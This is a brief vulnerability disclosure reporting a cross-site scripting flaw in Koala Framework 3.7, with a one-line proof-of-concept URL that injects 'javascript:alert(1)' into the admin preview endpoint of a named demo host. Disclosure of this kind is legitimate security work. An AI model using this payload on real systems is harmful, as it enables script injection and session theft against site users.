Koala Framework version 3.7 suffers from a cross site scripting vulnerability.
fea3eace4bbda92634460b64d395d7f0f99c59a8245fd90338fc6d34bc6ee31a
# Affected software: koala-framework
# Type of vulnerability:xss
# URL:koala-framework.org
# Discovered by: provensec
# Website: provensec.com
#version:
Version 3.7
# Proof of concept
http://cms-demo.koala-framework.org/admin/component/preview/?url=javascript:alert(1)